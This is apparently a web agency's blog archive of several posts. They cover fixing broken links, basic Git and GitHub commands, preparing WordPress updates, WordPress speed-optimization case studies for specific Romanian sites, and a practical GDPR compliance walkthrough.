Google constantly refines its ranking algorithm and the signs are that it will continue to do it in the near future. The ultimate Google Search purpose is to ensure the best user experience regardless of the context (query, device used, Internet connection etc).

Broken links don’t hurt so much the user experience, but these might be that detail that makes all the difference. A backlink within an article aims at providing more information about the topic debated. It’s totally annoying to open that additional source and get a boring 404 page.

Don’t consider broken links only as a technical problem. Readers consider that you don’t care about them if your content has broken links.

What Are Broken Links

Broken links or dead links are that links that don’t work, these direct the readers to resources that don’t exist anymore. It may happen due to various reasons such as:

the website you linked has been abandoned;
that webpage you linked has been removed;
you mistyped the link.

There are two types of broken links. Internal broken links refer to the links from a webpage of a site to another webpage from the same site. You have full control over these links. External broken links refer to the links pointing to another site. You don’t have full control over these links because you don’t know what would happen to the site you linked.

Why Broken Links Matter?

Let’s summarize why broken links are so important. As I previously mentioned it’s about user experience. The visitor who clicks on a link expects to be directed to an additional source. The source you linked might be a research to prove your statement, a page offering in-depth data, or a resource to better explain a subject. If you fail to offer what you promise, the readers feel cheated and act consequently.

The spiders of the search engines are also frustrated with the broken links, so you lose a chance of getting a higher rank. An internal broken link means that the link equity of the page you link isn’t transferred to your page. Why would you miss the chance of improving the SEO of a page when it’s pretty simple to fix the broken links?

Ways to Find and Fix Broken Links

Luckily, there are many ways to find and fix broken links. Ahref and Semrush are premium tools that work miracles for webmasters. These help in identifying the broken links but the subscription price is high for the most budgets. These provide much value for your money but using them only for fixing broken links it’s a smart decision. Briefly, you can find and fix broken links without using expensive tools.

Google Search Console

Google Search Console (GSC) is the most accessible tool for finding broken links. All you have to do is to access the Search Console and visit Index > Coverage > Errors. You did a good job if you have no errors. Elsewhere, GSC showcase a list of broken links and you have to manually fix each one. Keep in mind that GSC doesn’t offer data about the external broken links.

Desktop Software

Screaming Frog is one of the most famous desktop software used by webmasters and with just a few filters you may find out the dead links of your site. This tool crawls for free 500 URLs, but you have to purchase a premium license for removing this limit. Download and install it, carefully read this guide showing how to find the dead links, and do all your best to fix them. It works for Windows, Mac, and Linux.

Integrity is a reliable alternative for Mac users and Xenu’s Link Sleuth is for Windows users.

Online Link Checkers

Online link checkers are the most convenient alternatives to find and fix broken links. Just open a new tab in your browser, visit the online checker, add your site address, and in a few moments, the tool checks your site and generates a list of broken links.

Ahref Checker

Ahref is a famous tool for marketers and content creators. Ahref Checker finds the broken links - both internal and external and does it for free. A huge plus of the app is that it provides the anchor text and the link, so you go directly to the broken links and fix them in no time.

Dr Link Checker

This tool fully deserves your attention due to efficiency and good aesthetics. It does perfectly what a link checker should do - highlight the broken links. Unlike other competitors, its interface is modern and intuitive. You have to purchase a subscription if your site has 1500+ links.

W3 Link Checker

This checker is developed by the World Wide Web Consortium - a famous international community of developers. Under these circumstances, you shouldn’t doubt the checker performance even though its interface isn’t stellar.

WordPress Plugins

Someone once said that there is a plugin for every WordPress related issue and it looks that it’s also valid in the matter of broken links. There are a couple of effective plugins aimed at detecting the broken links.

Most of them are lightweight, but you will use them sporadically. Therefore, confidently use a plugin but delete it after finishing the job. In this way, you avoid hogging your site files, so the website loads faster.

From a security perspective, any installed plugin equals a new vulnerability, so you have another reason to delete it. Check these two plugins aimed at finding and fixing broken links.

Broken Link Checker

This is the most frequently installed plugin for checking broken links. Install and activate the plugin and it will crawl the site for broken links. It detects dead links, missing images, and redirects. Optionally, you can get the crawling report via email or by logging in to the WordPress dashboard.

Besides irreproachable functionality, this plugin impresses with the many customization options.

WP Broken Link Status Checker

This plugin focuses on searching for dead links without impacting the site performance. The innovative idea is that users configure the scan of the crawler. It’s that simple - name the scan - for instance, published post checking, chose to crawl only the published posts and get notified by each broken link. Save the configuration for performing the same scan in the future.

The only downside of this plugin is the long period since it hasn’t been updated. It may conflict with other plugin or with the theme of your site.

Over to You

Finding and fixing broken links isn’t funny at all, but it’s not rocket science. Use any of the above suggestions and check your site against dead links periodically. It depends on the site size, but fixing broken links shouldn’t take you much time.

How do you manage the broken links? Do you pay attention to them or you simply ignore them?

The beginner’s guide to Git and GitHub

Andrei Chira — Mon, 05 Aug 2019 00:00:00 GMT

More and more top employers, including Google and Microsoft, are focusing more on Stack Overflow, Git, and GitHub accounts than on resumes.

These accounts say a lot more about your knowledge and skills than a CV because they effectively reveal what you’ve worked on.

Past or side projects, contributions to open source works, and your interaction with other developers are more relevant than a self-proclaimed title of “Master of JavaScript.”

Under these circumstances, you’d better learn how to get the most from Git and GitHub. To do that, start with our beginner’s guide - Git for beginners. Both tools have a steep learning curve, so be ready to invest substantial time and resources.

What is Git?

Git

Linus Torvalds created Git in 2005 to help his development team work collaboratively on the Linux kernel. Over time, Git turned into the favorite version control system (VCS) of most developers, coders, and designers.

A VCS records the changes performed to a file or a set of files over time, and it allows users to recall particular versions later on. This functionality is golden for teams of developers working on complex code.

What is GitHub?

Github

You need a place to store the files you use for each project, and GitHub is the preferred solution of Git users. It’s a remote storage solution trusted by millions of users, so you can use it confidently.

On top of that, it’s free (you only have to pay when you want to keep private repos and your team is bigger than four members).

Vocabulary

Some of these terms might be familiar to you, while some might be totally new. Either way, you should know them by heart if you plan to work with Git and GitHub in the future.

Commit: An individual change to a project. It’s similar to the “Save” option in Microsoft Word or Google Docs, but it shows the date and the author of the commit. A useful rule of thumb: any time you commit, write a short message explaining what you have done.
Diff: The difference between two commits.
Push: When you send one or more commits to a remote repository. It happens when you’re working on a project, and you want your contribution to be reviewed and eventually added to the project.
Clone: A copy of a repository stored on your hard drive.
Fork: A clone of a repository stored in your account storage space.
Branch: A copy of a repository that doesn’t affect the master copy. It’s a useful feature when a number of developers are working on the same project. A developer can work on one branch without adding any changes to the master.
Pull Request: A proposed change carried on a fork or a branch that is submitted to be reviewed by the team members.

Git and GitHub Installation

I assume that your computer runs on Mac or Windows. If you are a Mac user, download the Git version you need here. Windows users may download Git version for their operating system here.

Creating an account on GitHub is similar to creating an account on Facebook. You can do it in no time.

Basic Commands

Now it’s time to use Git and GitHub like a pro. Open a terminal of your choice (Git Bash or Powershell) and write the following line to check if Git is correctly installed:

$ git --version

Once Git is correctly installed, you have to personalize it. The following two lines of code will configure your username and email address:

$ git config --global user.name “Your Name”

$ git config --global user.email “example@mail.com”

Create a Repository

At this stage, you have installed and configured Git. Create the first repository to start your work. Go to the GitHub dashboard and click on the + button in the top right bar. For learning purposes, I’ve created a test project without initializing the project with a README file. Hit the Create repository button, and voila! Your first repo is online!

Clone a Repository

Follow the next steps to clone a repository on your computer:

Go to the repository to get cloned and copy the HTTPS address.
Create a directory to host the clone. Use the mkdir command in your terminal.
Git clone is the command to clone the repo onto your hard drive.
If you have accurately followed all the steps and your repo is empty, you will receive the following message “You appear to have cloned an empty repository.”

Add a File to the Repo

Follow the next steps to add a file to your local repository:

Go to the local repository and create a file in that directory. Let’s use an HTML snippet called “Table1.html.”
Make sure that your working folder in the command line is the local repository.
Write the command git add (in our case, Table1.html) or git add . to add all the files to the repo.
To make sure you add the file, write git status.
Commit the file staged in your local repo with git commit -m “Your message”.
Finally, write git push origin master in the command-line text area. Now, the file (in our case, Table1.html) should be in your GitHub repo.

Working Collaboratively

A huge advantage of Git is the possibility of working collaboratively. Being part of a team implies working individually on a particular feature and getting feedback from colleagues. Git allows for this type of work.

Let’s suppose you have a group of files—the master project. You develop a new feature based on the master project and start adding your own contribution. Next, you submit your work for review by your collaborators.

In Git terminology, you work on a branch without affecting the master (aka, the agreed-upon files). If you use the command line, you create a branch by typing this command:

git checkout -b new_feature

(replace new_feature with your favorite title).

From now on, you’ll work on your branch and rest assured that your work doesn’t interfere with the master copy. You can merge your branch with this command:

git merge new_feature

Wrapping Up

Working with Git and GitHub isn’t simple.

This guide features only a limited number of basic commands, but many others are available to streamline your work. Don’t worry if you don’t write the correct commands on the first try; it has happened to every beginner.

You will get accustomed to working with Git and the command line after hours of practice. The advantages of Git are significant, so your endeavors will pay off in the long run.

What to do before updating your WordPress site

Elena Chira — Fri, 12 Jul 2019 00:00:00 GMT

Updating your WordPress website may seem trivial and even unnecessary at times. After all, if your website is working properly and without any fuss, what is the need to update it in the first place?

As it turns out, consistently updating your website is a must. It improves your website’s performance, addresses unresolved security issues, enhances accessibility and website experience, besides adding several new features.

WordPress is like the center of its own solar system and is constantly being upgraded. The platform sees frequent updates thanks to feedback from the vibrant user community and an increasing number of trusted developers. Of special importance is the user feedback: they provide keen insights into what’s working, what’s not, and how things can be made better.

The fact that WordPress is open to suggestions is the reason why they have managed to reach warp speed and outshine other CMS providers.

And while WordPress is legendary for its superior design and ease of use, many users get a lot of things wrong when updating.

This post details some points to remember and an outline of everything you must do before you start updating your WP-powered site.

Before that, you have to understand why updating regularly is necessary.

Why do you need to update WordPress?

Understanding ‘why’ should always come before the ‘how’ and ‘when’ sections. When we understand the purpose of what we’re doing, the process makes sense. So before we get to how we can safely update WordPress, let’s understand why we even need to do it.

Security: Perhaps the most essential reason behind keeping your WordPress site updated is security. WordPress might be the most popular CMS, but it does have its share of security loopholes, mainly through third-party plugins. Updating it regularly fixes these issues. Data theft or hacking is a nightmare which no website owner wishes to face.
Fixes any bugs: Despite repeated and rigorous bug testing sessions, a few manage to hang on for dear life. More bugs often creep in when new features are added, as that means more coding is added. Updating to the latest available version manages to fix most bugs. You can also check the changelog that accompanies each update here.
Adds new features: WordPress manages to add extra value to their product every time they offer an update. Consider when WP version 3.8 was released to replace v3.7. Not only was the dashboard improved; a completely overhauled default theme was also provided.
Speed: No one likes a slow site, especially if they are your paying customers. Updated versions are optimized to increase the speed of your website.
In sum, updating makes your life as the owner easier and helps your clientele use your website to better effect.

Things to do before updating your WP site

Generally, there are no major difficulties when updating your version of WordPress. Occasionally, errors arise - this could be a small hiccup or a major crisis. If you are the owner or the administrator of a website which requires an immediate update, there are some preparatory steps you must keep in mind.

1. Back up your website first

Always, always back up your website before you start the process. If something does go wrong, you can always go back to the functioning version and not lose everything you have developed over the years.

A few basic facts must be made clear here. A WordPress-powered site consists of 2 parts - the files and the database. If both these elements are backed up, you can get your website up and running in no time at all.

The quickest and easiest way to back up your website is to install a backup plugin. There is a handful of options in the market, but you need to choose wisely depending on the type of site you have. Not all backup plugins are the same. Choosing a reliable one like BlogVault will ensure you always have a working backup ready to be restored. Plus you get the option of staging a site, so you can test out things before you make any changes to your live website. That brings us to point 2.

2. Never attempt an upgrade on a Live Install

This is a cardinal error and should be borne in mind at all times. Many errors can prop up while rolling out updates. One such error is a blank screen, also known as White Screen of Death. In case your update attempt is botched due to some reason, all your visitors will see is a blank screen.

To avoid it, new updates must always be tried out on a remote copy of your site. Regardless of whether on a local installation or a staging server, this rule must be followed on all occasions. Think of this step as sandboxing, a testing phase before live operations begin.

3. Install major updates later

Major updates will have to wait for some time. You can easily identify a major WordPress update as the first or the second portion of the version name will change. E.g., 4.1 is a major update, but version 4.1.2 would be a minor one. A major update may have some bugs; moreover, the audience at large does not know what to expect from the new version or how to react to it either.

All major updates are almost always followed by smaller ones which are aimed at fixing and resolving bugs. These bugs are identified when the new version goes live.

Wait for these new updates to emerge and then upgrade. That said, any update that carries a security patch must be installed as soon as they are launched.

4. Use only child themes and plugins

If you are using one of the default WordPress themes and have made customizations to it, if the theme is updated in the WordPress core update, then you stand to lose all your customizations. You’ll have to recreate them in the updated version.

To avoid this hassle, you can create a child theme and make all your customizations. It remains unaffected from the update which will apply only to the parent.

The same method applies to all themes and plugins, not just default ones. If you need to make customizations, it’s best to create a child theme or plugin. Whenever you update it, only the parent gets updated, and your customizations are never lost.

5. Turn off caching

Before any update attempt, turn automatic caching off. Leaving this option on will seriously alter the back-end operations of the website.

Updating a website with the caching will only show the cached version of the page and not the newly-updated one. The same will happen if you publish a page with caching on during the update. There’s a high chance that you will only see the older version minus the changes made post the update.

Consider this thumb rule as far as caching is considered during the update - disable caching plugins and additionally clear cache memory.

6. Keep automatic updates under control

All websites running on WordPress have, by default, their automatic updates enabled. It does have several advantages - minor releases, security fixes, and tweaks are installed automatically.

You can use plugins or manually configure WordPress to update the core, plugins, and themes automatically.

However, it is best to manually control updates in most cases, especially of third-party plugins.

For instance, sometimes, plugins/themes may not be compatible with the newest version of WordPress and may adversely affect your website. Testing out these elements before updating the live site is helpful in these scenarios.

7. Ensure all plugins are compatible

If there are any plugins which are not compatible with the latest WordPress version, they may break down, throwing your updated website into disarray.

It might not mean much to an amateur website owner, but it is always advisable to go through the latest and compatible versions of all plugins mentioned in the WordPress directory.

You will save yourself a lot of time and effort later.

8. Pro tip - Backup your site again

Even if everything went perfectly well and glitch-free, it is best to back up the site once again after updating it. You will still have access to the latest version of your website.

You can safely update your website by using one of the best backup plugins for WordPress.

If you have done everything correctly and have not skipped any of these steps, the entire process should not take too much time.

If you back up your site, test your updates out on a clone site, and then update your live site, your website will never face downtime on account of updates!

Blog optimization: just another case study

Andrei Chira — Tue, 16 Apr 2019 00:00:00 GMT

Aghiuta.com is a media monitoring and politics blog written by Florin Popescu. Here’s our WordPress optimization we did for this blog.

Before optimization

First page loading speed was 4.3 sec.

The homepage has 86 requests and 1.3 MB.

14 javascripts - 505.6 k
20 sites stylesheet - 41.1 k
23 files - 601 k

JS

Facebook Connect JS has 174.4K and is loaded in 0.69 seconds. The Facebook Like Box can be inserted as a text widget by copying the iframe code from the Facebook Developers Like Box page and that gets rid of the JS file.

Gonzo theme includes a script.js file that has 101.3K. It includes several scripts such as:

fitvids
flexslider
jquery easing
tabber tabs
backstretch
prettyphoto lightbox
elastislide

Backstretch is used for the large background image, but at least four of the others are not used: flexslider, prettyphoto, elastislide, tabber tabs.

Fitvids make video embeds responsive, so it’s probably needed.

jQuery Easing makes some effect on click (the slide from the search form).

In addition, jQuery Easing (8.1 K) is loaded once more by the LayerSlider (26K) plugin which is not used anywhere.

I removed the unused scripts and file size has decreased from 101.3K to only 29K.

Sharing buttons JS files

The plugin that puts the share buttons on the website has a pretty big impact on the loading time:

Plus 1 - 25.8K
Google Api - 84.2K
Twitter - 84.5K
Social Bar - 1.8K

All this can be solved by using another plugin (Jetpack) that loads a single JS file of 35K for all the buttons.

jQuery can be loaded from Google Library instead of loading it from the server.

The Addfreestats JS give a 404 error. We recommend using Google Analytics.

CSS

There are too many CSS files (20), some loaded with @import which is not the best option for performance.

We have combined what was possible (sometimes combining js or css files throws errors) and we now have only 7 CSS files.

Images

Images can be better optimized for the web (same quality but less KB) and I think we can save at least 5% of each image.

On the first page, thumbnails are 166x166px in size but the loaded pictures are larger, 300x300px.

The images should be loaded at 166x166px.

WordPress creates too many thumbnails:

960x677
150x105
300x211
550x387
700x426
300x300
50x50
290x166
620x310
620x350
186x186
620x220

The site only needs:

166x166 - first page thumbnails
50x50 - thumbnails for sidebar
134x77 - thumbnails for related posts
290x166 - thumbnail for category archive

The remaining dimensions are useless and occupy space on the server. We can delete them and eliminate the unnecessary code from the theme that tells WordPress to make those thumbs.

We implemented Lazy Load so only the images at the top of the page (above the fold) are loaded which gives a major improvement in perceived speed.

After optimization

After removing unnecessary code from JS files, combined CSS files, correct configuration and implementation of page cache and database cache the website now makes 48 requests and has 634,5K.

First page loading speed: 1.47 seconds.

We achieved a performance improvement of around 60%.

We can optimize further but that would mean removing some elements that provide specific functionality desired by the owner so we stopped here.

WordPress optimization for a book blog

Andrei Chira — Tue, 02 Apr 2019 00:00:00 GMT

Bookuria.info is a site dedicated to book lovers where you can find news, editorials on the cultural scene and fresh promotions and discounts from book publishers.

Bogdan, the owner, has chosen us to see if we can make his website faster, which was the main dissatisfaction with the old host.

Let’s see what we did!

Performance audit

Before, the website had an average load of 4.78 seconds, the page size was 2.5 MB and the number of requests was 125.

Among the page components:

37 JS - 627.6 K
17 CSS - 109.1 K
14 cssimages - 151K
31 images - 1640.5 K

Google PageSpeed Insights score was 73/100 and the main recommendations were:

reduces server response time (Currently 1.5 sec)
optimize images

A performance test of the plugins installed and enabled on the site shows that the Simple Share Buttons Adder plugin has a negative impact on loading speed:

plugin impact : 74.4%
plugin load time: 2.160 sec

After disabling that plugin and retesting, the numbers look a lot better:

plugin impact : 30.8%
plugin load time: 0.320 sec

Another factor that negatively affects site performance is the theme used. Time taken to load the theme is 1.22 seconds compared to 0.32 seconds it takes to load the plugins.

The theme has a problem that is very common in premium WordPress themes - trying to offer too many options and so it loads a large number of JS and CSS files.

Most options are not used in “real life” and site performance suffers.

The theme loads 34 JS files and many are useless.

There’s 3 Google Maps JS files totaling 199.6K and we never saw to be used anywhere on the site. Even if we wanted to place a map somewhere it can be done with iframe, we do not need so many JS files.

There are some JS files for loading Google fonts (39.1K) which is a very inefficient method, a Google Font Library has 0.3K and loads pretty fast.

There are JS files that do nothing for us: for example, Syntax Highlighter, useless on this particular site.

Theme works with timthumb.php to make thumbnails. WordPress knows to make thumbnails, you don’t need another PHP script to do that for you.

Another problem with timthumb.php is that it breaks Lazy Load and loading speed site suffers.

Optimization done

optimized images
replaced plugins with problems with other plugins that provide similar functionality but are more lightweight
eliminated redundant and inactive plugins
identified the theme lines of code that loaded the useless JS files and we removed them
implemented a page cache + database cache
updated WordPress to the latest version
updated all active plugins to the latest versions.

Results

A new test done with Pingdom Tools shows an average speed of 2.72 seconds, a good improvement from 4.78 seconds.

PageSpeed Insights gives us a score of 85/100, a nice improvement over the 73/100 initial score.

JS files number dropped to 21 totaling 334.4K compared to the initial 37 totaling 627,6K.

Unfortunately, the WordPress theme pulls the site down pretty hard. No matter how we optimize and how fast the server is the visitors must still download 2MB of information because Lazy Load is not working because of timthumb.

The main recommendation here is to replace the theme with one that does not load so many JS files and doesn’t use timthumb.php.

This could reduce the average time to load the website to around 1-1.5 seconds.

WordPress optimization for an online newspaper

Andrei Chira — Tue, 26 Mar 2019 00:00:00 GMT

Observatorul de Bacau is a local newspaper from a small town in Romania.

The loading time of the site was 6.37 seconds.

Homepage of the site had 66 components with a total size of 1105.9 KB.

But the main problem was not the page size. The poor performance of the site was due to the lack of database optimization.

Optimizing Database

Although it is common for an online newspaper to have a massive database due to the high volume of content published over the years, we found an extremely large database of 1.2 GB.

To give you an idea, the database export file produced more than 200 million lines.

Database tables created by old plugins were still there, and we found a huge space occupied with duplicate indexes.

As an example, the posts table had ~150 MB of data and ~450 MB of indexes.

We cleaned the database tables and we have managed to reduce its size to less than half, ~510MB from 1.2GB.

Cleaning the files

Disk space occupied on the server was over 13 GB. There were six WordPress installs in different folders and subfolders, old and outdated.

Those installations of WordPress had themes and plugins all old and outdated and represented potential security holes.

Also, we found very large error_logs of over 1GB.

After we made a backup of the entire hosting account we started to clean everything and keep only the necessary stuff.

Optimizing images

Another issue that was affecting site performance on unoptimized photos for the web.

This is a common problem of online newspapers. There are many authors that publish articles on the site and they upload photos directly from the camera.

We found in the WordPress gallery pictures at very high resolutions, even 12 megapixels, that were occupying disk space and affecting loading speed of pages in which they were displayed.

We resized those photos to 1024*1024px, a normal resolution for viewing pictures online. After that we optimized them with WP Smush, which also decreased more the number of KB.

This way we managed to reduce the space occupied on disk from 13GB to less than 4GB.

Optimization plugins

The newspaper had 22 active plugins, some not recommended such as WP Postviews. This plugin makes quite inefficient writes to the database on each page view.

We replaced the bad plugins with better choices, eliminated redundant ones and decreased the number of plugins to 16.

We also configured page cache and database cache.

Since there are a large number of images displayed on the site we have implemented Lazy Load to get a better loading speed.

We updated both WordPress and all plugins to the latest versions.

Conclusion

Although Bacau Observatory is still hosted on a shared hosting package, after we optimized it the average speed of the site is now 2.65 seconds with a 60% improvement.

It could be better by moving to a better hosting but that’s the owner’s choice.

How to make your WordPress site GDPR compliant

Elena Chira — Thu, 21 Mar 2019 00:00:00 GMT

GDPR is the EU privacy protection legislation that came into force on May 25, 2018.

A couple of weeks before that date it was a rush of panic from many of our customers, asking us for help to implement GDPR on their WordPress blogs.

I promised I will write an article about GDPR, but I did not write this until now, almost a year after. That’s because I waited to see what tools would emerge to facilitate the implementation. Then I documented and implemented on my websites.

First of all, GDPR is nothing to panic about.

It’s a common sense law that wants to make site owners accountable for the personal data they collect from site visitors.

Because the personal data belongs to these people and we, as site owners, can not do what we want with this data. We need their acceptance to collect and process the data in a certain way.

That was the most asked question from our customers, who are mostly small and medium independent publishers.

You have to be compliant because you save personal data without knowing it.

If you embed a video from Youtube or have Facebook share buttons on your site, cookies are saved in the visitor’s browser.

These cookies are considered personal data because they can identify a person. They can track the visitor from one site to another, or create demographic profiles, etc.

The problem is that sometimes your website saves that personal data. But it is entirely unnecessary, you do not use the data yourself.

Ok, what do I do to comply with GDPR?

Well, you must demonstrate that you understand and respect the rights of individuals whose personal data you save and process.

At the same time, you should actually respect those rights, not just write in your privacy policy that you respect it.

If a person solicits the removal of their data or unsubscribes from your newsletter, you must respect the person’s request.

As I said above, these are common sense things. If you respect site visitors and customers whose personal data you collect, you are already on the right track.

The easiest way to implement GDPR on your WordPress site is to use an external solution, a specialized service such as:

This easy option is not free. But there is no way to be compliant with GDPR without paying - you either pay with money, or you pay with time and effort.

Implementation is pretty complicated and involves both configurations or even programming and also legal counseling from a specialized lawyer.

Below, I will tell you how I implemented GDPR on my WordPress websites. I must mention that I am not a legal counselor, and this tutorial does not equal legal advice.

To be compliant with GDPR, we need the following:

a privacy policy page
cookie information (it may be included in the privacy policy)
explicit consent to data collection (cookie banner notice)
the possibility to withdraw consent
tools for exercising rights (data export, data deletion)

Tools for exercising rights are integrated in WordPress since version 4.9.6. You can export or delete personal data if you are asked to do so. We have placed contact information in our privacy policy so that anyone who wants to exercise these rights can contact us.

The privacy policy

The privacy policy should contain the following information:

the contact information of the site owner
the contact information of the national data protection authority
the data you collect
how you use the data
who has access to data
how do you secure the data
cookie information
what are the rights of the people whose data you collect
how can they exercise their rights

A privacy policy model is found in the WordPress administration interface. Go to Settings> Privacy, and then click the “Check out our guide” link.

privacy page

I have used a privacy policy model generated by the GDPR Framework plugin that I modified with the relevant information for each of my sites.

Once you’ve created the policy page, you need to add it to a navigation menu, usually in the footer of the site.

What data we collect, and what we use it for

As part of privacy policy, it is also important to state which personal data you collect, so we need to know what personal information we collect.

As mentioned above, sometimes we save data without knowing.

To identify what personal data we collect, you need to audit your site to understand how it works and how it stores data. Each website is different, it uses different themes and plugins and has various implementations.

On a simple blog, you collect data through:

the WordPress comment form
cookies placed by plugins

The data collected by the comment form is the commentator (name, email address, website) as well as the IP address and a user agent. This data is used to fight spam.

WordPress default cookies are those in comments (name, email, website) and to be compliant with GDPR. A check mark has been inserted in version 4.9.6 to allow the commentator to accept if he wishes these cookies to be saved in your browser.

Data for online stores

If you have an online store, you also collect data through the order form of the products/services on the site. You may use these data only for processing the order: billing, delivery, etc.

Other sites can collect data via marketing plugins, contact forms, or newsletter subscription forms. People need to know what you do with the data you collect. You cannot send a newsletter to those who have not explicitly subscribed to that newsletter.

A trick that some shops were doing was to put a pre-checked box on the checkout page, and the customer was automatically subscribed to the newsletter. This is no longer legal. You can have the box if you want it. But it cannot be pre-checked, the visitor must check it if he wants to subscribe to the newsletter.

Various WordPress plugins can collect other data (cookies): social media buttons, tracking codes like Google Analytics or embeds from other sites (Youtube videos, for example).

All this needs to be identified, and once we have determined what data we collect and how we collect them, we need to decide if we actually need them or not.

Identifying cookies

The easy way to identify what cookies your site saves is to use a free trial from one of the services listed above (OneTrust, for example). They will scan all the pages of your site, list all cookies and categorize them.

The manual method

The hard method is to identify cookies manually.

If you use the Google Chrome browser, delete cookies and cache from the browser, then navigate to your website, right click on the page, then click Inspect, go to the Application section, then click Storage and then Cookies (in Safari it’s Inspect Element > Storage > Cookies).

You have to check all the pages of the site to identify cookies, which is hard to do by hand.

Some pages are similar so it would be worth checking out:

first page
archives (categories, tags, search, etc.)
single post page
pages that have embeds from other sites
newsletter subscription page
contact form page
pages with other forms or stuff that saves data (survey etc.)

As you can see, it’s hard to check manually so, it is best to use a specialized service which automatically scans all pages of the site.

The automatic method

Once identified, cookies should be broken down into categories:

essential (website cannot work without)
statistics (Google Analytics, for example)
social media (Facebook, Youtube, etc.)
advertising (retargeting, remarketing, etc.)

According to GDPR, when visitors enter the site, they must be told that you are saving cookies, you must let them know what cookies you save, and they have to give you consent to save these cookies.

It is not ok to set all cookies as essential and to have just an acceptance button; cookies must be accepted or refused for each category.

At the same time, you must also have a cookie settings page from where the visitor can withdraw his acceptance if he has given it to you in the past or to accept if he has declined in the past and now has changed his mind.

If a visitor refused the social media cookie category, for example, when visiting the site, social media scripts should be blocked.

Complicated, right?

Yeah, I didn’t find a WordPress plugin that does everything automatically.

Pluggins I’ve tested

The plugins I’ve tested are:

At the time of my testing, none of them seemed complete, they needed additional implementations, some quite complex for an average user.

That’s why I recommend specialized external solutions, especially for sites that need to save cookies. I’m talking about sites that perform retargeting, remarketing, conversion rate optimization, etc.

But most websites don’t need to save all those cookies and could work just fine.

According to the GDPR law, if we do not collect cookies that are considered personal data, then it is not mandatory to ask for the visitor’s consent to save cookies.

So, if we only save essential cookies, we are not required to display that cookie banner notice, and we also get rid of the complex implementations of blocking scripts and cookie settings.

I find it absurd to ruin your site design and user experience by displaying a pop-up asking visitors to give you permission to save cookies that you don’t even need or use.

So let’s remove non-essential cookies, this is precisely in the spirit of the law, i.e., not to save personal data unless we have a legitimate reason to.

I have already identified the cookies on my website, and the problematic ones (personal data) are:

Google Analytics cookies
share button cookies (Facebook)
Youtube cookies

How to get rid of Google Analytics cookies

I don’t use demographics or remarketing in Google Analytics / Adsense / Adwords, so I don’t need them.

Basically, you have to do 4 things in your Google Analytics account:

accept the data processing amendment
disable data sharing
disable data collection for advertising features
disable user-ID

This is the tutorial I followed for setting up all the above. It is written by the developer of the CAOS plugin.

After that, the final step is to anonymize visitor IPs.

I ditched the Google Analytics plugin that I used, and manually copied the tracking code to which I added the following code.

ga('set', 'anonymizeIp', true);

If you do not feel comfortable working with code, another option is to use the Google Analytics plugin called CAOS - it has an Anonymize IP checkmark in the settings.

Okay, we’ve got rid of Google Analytics cookies that are personal data; Google Analytics will work just fine without it.

How to get rid of Facebook cookies

Bill Erickson & Jared Atchinson have made a share button plugin that is compliant with GDPR, meaning it does not save cookies, tracking scripts, absolutely nothing that is personal data.

The plugin is called Shared Counts.

I’ve replaced the share button plugin with this GDPR-compliant plugin, and so I’ve removed the Facebook cookies.

How to get rid of Youtube cookies

I have embedded videos on some pages on the site, and fortunately, there are not many so I can change them manually. If you have more, you can search & replace with a WordPress plugin or directly in the database.

I’ve replaced youtube.com URL in the embed code with the youtube-nocookie.com URL.

That’s it.

I’ve identified what cookies are saved and eliminated those that I did not need, leaving only those strictly necessary, for which I don’t need to get visitor consent because they aren’t considered personal data.

This has eliminated the need to have a banner notice cookie on my website.

Keep in mind, what I did above was specifically for my websites; you may have other cookies on your website, each site is different.

Other considerations

I’ve tried to make this GDPR tutorial as easy as possible, but it’s a very complicated matter.

What I have described in this article generally fits most simple websites like my blog or my business, but for shops or other online businesses, it’s not enough just to implement some stuff on the site, you also need some administrative implementations.

For example, we have done the following:

we appointed a DPO (data protection officer)
we requested a DPA (data processing agreement) from all partners where we store data
we are drafting a DPA that we can offer to our clients
we’ve done training for our employees on data protection

I hope this has helped you make your WordPress website GDPR compliant, if I missed something, feel free to leave a comment, I’ll try to answer questions, or direct you to the relevant resources.

WordPress optimization for Wide Magazine

Andrei Chira — Sat, 16 Feb 2019 00:00:00 GMT

Wide Magazine is a lifestyle magazine presenting cool experiences in downtown Bucharest.

Although the magazine was hosted on a VPS the speed was slow. The cost of the managed VPS seemed unreasonably high.

Loading speed of the site was 6.99 seconds, page components totaling 2.5 MB and doing 113 requests to the server.

before optimization

The homepage was loading:

30 JS files - 883.2 K
11 CSS files - 138.3 K
22 CSS images - 255.2 K
13 images - 1320.7 K
1 favicon - 16.9 K

Google PageSpeed Insights score was 57/100, the recommendations were:

enable compression
leverage browser caching
optimize images
reduces server response time

before optimization

Optimization Report

Even the favicon has too much KB. We did a test, downloaded it and imported to favicon.cc where we generated a new one. We got a file of 1.6 K (though of lesser quality).

Images

Images are not optimized and also they can be displayed gradually as visitors are scrolling to speed up the loading of above-the-fold content (lazy load).

Another problem with displaying images is that they are loaded in their original size (1024*682px) and the browser resizes them to 676*450px.

It is recommended that the images are uploaded directly in 676*450px resolution or setting a thumbnail in that particular size.

This way the browser works less with resizing pictures + page size (KB) decreases. These two factors lead to the improvement of the loading speed.

For example, we took a random picture which had 163KB, we did a resize to 676*450px and after that we optimized it with jpegmini.com. The resulting file had 70.7 K.

Even left at 1024*682px and just optimizing it with JPEGMini we got a file of 90.3K, a notable improvement over the initial 163K.

JS files

The next thing that we looked for is the number and overall size of JS files - 30 files totaling 883.2K.

And here we found some problems too.

JQuery was being loaded twice - the 1.9.1 version (92.6K) from code.jquery.com and the 1.8.3 version (93.6K) loaded from the local WordPress folder.

Same problem with the Google Analytics code - once the old version, ga.js (39.8K) and once the new version, analytics.js (20.3K).

That’s a 133.4K extra.

There are several JS files being loaded by 2 plugins which essentially are doing the same thing, displaying photo galleries: NextGen Gallery and PrettyPhoto Media.

PrettyPhoto Media does not seem to be used so it can be removed to save about 50K and 2 requests.

Plugins

2 additional plugins, jQuery Mega Menu and Useful Banner Manager, can be eliminated. jQuery Mega Menu does not appear to be used anywhere. Useful Banner Manager is used for a single banner, which could be shown by a simple html code inserted into a text widget.

The ShareThis plugin that adds share buttons to the posts uses a JS of 125.1K. It could be replaced with Jetpack which uses a JS of only 38.5K.

Facebook Like Box is not implemented in the most efficient way, using a JS of 171.9K.

The simplest and most effective method is to copy the iframe code from the Facebook Developers Like Box page and paste it into a text widget, thus eliminating the need for JS.

Google Maps plugin uses four JS files totaling 60.7K.

Just as with the Like Box Google Maps can also be integrated with an iframe.

I checked the last 10 posts and none have integrated a map so if it’s not a standard functionality and it is used only rarely, it is more efficient to manually enter the maps with iframes in posts.

What we did

we optimized images
we set progressive loading of images on the site
we implemented page cache + database cache
we solved the duplicated jQuery
we solved the duplicated Google Analytics JS
